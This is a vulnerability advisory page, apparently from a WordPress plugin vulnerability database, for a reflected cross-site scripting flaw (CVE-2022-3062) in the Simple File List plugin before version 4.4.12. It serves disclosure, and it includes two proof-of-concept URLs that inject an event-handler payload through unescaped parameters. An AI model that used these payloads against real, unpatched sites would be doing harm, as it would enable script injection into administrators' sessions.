Simple File List < 4.4.12 – Reflected Cross-Site Scripting | CVE 2022-3062 | Plugin Vulnerabilities

Description

The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=ee-simple-file-list&tab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//

https://example.com/wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

simple-file-list

Fixed in 4.4.12

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

2e829bbe-1843-496d-a852-4150fa6d1f7a

Timeline

Publicly Published

2022-08-30 (about 1 years ago)

Added

2022-08-30 (about 1 years ago)

Last Updated

2022-08-30 (about 1 years ago)

Other

Published

Title

Published

2021-10-19

Title

Tutor LMS < 1.9.11 - Reflected Cross-Site Scripting

Published

2024-04-29

Title

Premium Addons for Elementor < 4.10.31 - Contributor+ Stored XSS

Published

2021-09-06

Title

ELEX WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting (XSS)

Published

2018-08-10

Title

Ultimate Member < 2.0.22 - Authenticated Cross-Site Scripting (XSS)

Published

2015-08-04

Title

Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)